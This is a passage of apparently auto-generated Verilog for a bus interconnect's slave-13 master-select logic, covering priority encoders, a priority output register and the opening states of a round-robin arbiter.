            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) } == 2'h1 ) 
                begin
                    s13_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) } == 2'h2 ) 
                    begin
                        s13_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s13_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[3] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[3]) ) 
        begin
            s13_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s13_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[4] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[4]) ) 
        begin
            s13_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) } == 2'h1 ) 
                begin
                    s13_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) } == 2'h2 ) 
                    begin
                        s13_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s13_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[4] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[4]) ) 
        begin
            s13_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s13_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[5] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[5]) ) 
        begin
            s13_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) } == 2'h1 ) 
                begin
                    s13_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) } == 2'h2 ) 
                    begin
                        s13_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s13_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[5] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[5]) ) 
        begin
            s13_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s13_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[6] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[6]) ) 
        begin
            s13_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) } == 2'h1 ) 
                begin
                    s13_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) } == 2'h2 ) 
                    begin
                        s13_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s13_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[6] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[6]) ) 
        begin
            s13_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s13_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[7] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[7]) ) 
        begin
            s13_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) } == 2'h1 ) 
                begin
                    s13_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) } == 2'h2 ) 
                    begin
                        s13_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s13_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s13_msel_pri_enc_valid[7] or  { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) })
    begin
        if (  !( s13_msel_pri_enc_valid[7]) ) 
        begin
            s13_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) } == 2'h0 ) 
            begin
                s13_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s13_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s13_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s13_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd0_pri_out_d0 ) : ( s13_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s13_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd1_pri_out_d0 ) : ( s13_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd2_pri_out_d0 ) : ( s13_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd3_pri_out_d0 ) : ( s13_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd4_pri_out_d0 ) : ( s13_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd5_pri_out_d0 ) : ( s13_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd6_pri_out_d0 ) : ( s13_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd7_pri_out_d0 ) : ( s13_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s13_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd0_pri_out_d0 ) : ( s13_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s13_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd1_pri_out_d0 ) : ( s13_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd2_pri_out_d0 ) : ( s13_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd3_pri_out_d0 ) : ( s13_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd4_pri_out_d0 ) : ( s13_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd5_pri_out_d0 ) : ( s13_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd6_pri_out_d0 ) : ( s13_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd7_pri_out_d0 ) : ( s13_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s13_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s13_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s13_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s13_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s13_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s13_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s13_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s13_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd0_pri_out_d0 ) : ( s13_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s13_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd1_pri_out_d0 ) : ( s13_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd2_pri_out_d0 ) : ( s13_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd3_pri_out_d0 ) : ( s13_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd4_pri_out_d0 ) : ( s13_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd5_pri_out_d0 ) : ( s13_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd6_pri_out_d0 ) : ( s13_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s13_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s13_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s13_msel_pri_enc_pd7_pri_out_d0 ) : ( s13_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s13_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s13_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s13_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s13_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s13_next ) 
            begin
                s13_msel_pri_out <= ( ( ( s13_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s13_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s13_msel_pri_enc_pri_out0 ) : ( s13_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s13_msel_arb0_req = { ( s13_msel_req[7] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) } == 2'd0 ) ), ( s13_msel_req[6] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) } == 2'd0 ) ), ( s13_msel_req[5] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) } == 2'd0 ) ), ( s13_msel_req[4] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) } == 2'd0 ) ), ( s13_msel_req[3] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) } == 2'd0 ) ), ( s13_msel_req[2] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) } == 2'd0 ) ), ( s13_msel_req[1] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) } == 2'd0 ) ), ( s13_msel_req[0] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) } == 2'd0 ) ) };
    assign s13_msel_arb0_gnt = s13_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s13_msel_arb0_state <= s13_msel_arb0_grant0;
        end
        else
        begin 
            s13_msel_arb0_state <= s13_msel_arb0_next_state;
        end
    end
    always @ (  s13_msel_arb0_state or  { ( s13_msel_req[7] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[15] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[14] ) ) } == 2'd0 ) ), ( s13_msel_req[6] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[13] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[12] ) ) } == 2'd0 ) ), ( s13_msel_req[5] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[11] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[10] ) ) } == 2'd0 ) ), ( s13_msel_req[4] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[9] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[8] ) ) } == 2'd0 ) ), ( s13_msel_req[3] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[7] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[6] ) ) } == 2'd0 ) ), ( s13_msel_req[2] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[5] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[4] ) ) } == 2'd0 ) ), ( s13_msel_req[1] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[3] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[2] ) ) } == 2'd0 ) ), ( s13_msel_req[0] & ( { ( ( ( s13_msel_pri_sel == 2'd2 ) ) ? ( rf_conf13[1] ) : ( 1'b0 ) ), ( ( ( s13_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf13[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s13_msel_arb0_next_state = s13_msel_arb0_state;
        case ( s13_msel_arb0_state ) 
        s13_msel_arb0_grant0:
        begin
            if (  !( s13_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s13_msel_arb0_req[1] ) 
                begin
                    s13_msel_arb0_next_state = s13_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s13_msel_arb0_req[2] ) 
                    begin
                        s13_msel_arb0_next_state = s13_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s13_msel_arb0_req[3] ) 
                        begin
                            s13_msel_arb0_next_state = s13_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s13_msel_arb0_req[4] ) 
                            begin
                                s13_msel_arb0_next_state = s13_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s13_msel_arb0_req[5] ) 
                                begin
                                    s13_msel_arb0_next_state = s13_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb0_req[6] ) 
                                    begin
                                        s13_msel_arb0_next_state = s13_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb0_req[7] ) 
                                        begin
                                            s13_msel_arb0_next_state = s13_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb0_grant1:
        begin
            if (  !( s13_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s13_msel_arb0_req[2] ) 
                begin
                    s13_msel_arb0_next_state = s13_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s13_msel_arb0_req[3] ) 
                    begin
                        s13_msel_arb0_next_state = s13_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s13_msel_arb0_req[4] ) 
                        begin
                            s13_msel_arb0_next_state = s13_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s13_msel_arb0_req[5] ) 
                            begin
                                s13_msel_arb0_next_state = s13_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s13_msel_arb0_req[6] ) 
                                begin
                                    s13_msel_arb0_next_state = s13_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb0_req[7] ) 
                                    begin
                                        s13_msel_arb0_next_state = s13_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb0_req[0] ) 
                                        begin
                                            s13_msel_arb0_next_state = s13_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb0_grant2:
        begin
            if (  !( s13_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s13_msel_arb0_req[3] ) 
                begin
                    s13_msel_arb0_next_state = s13_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s13_msel_arb0_req[4] ) 
                    begin
                        s13_msel_arb0_next_state = s13_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s13_msel_arb0_req[5] ) 
                        begin
                            s13_msel_arb0_next_state = s13_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s13_msel_arb0_req[6] ) 
                            begin
                                s13_msel_arb0_next_state = s13_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s13_msel_arb0_req[7] ) 
                                begin
                                    s13_msel_arb0_next_state = s13_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s13_msel_arb0_req[0] ) 
                                    begin
                                        s13_msel_arb0_next_state = s13_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s13_msel_arb0_req[1] ) 
                                        begin
                                            s13_msel_arb0_next_state = s13_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s13_msel_arb0_grant3:
        begin
            if (  !( s13_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s13_msel_arb0_req[4] ) 
                begin
                    s13_msel_arb0_next_state = s13_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s13_msel_arb0_req[5] ) 
                    begin
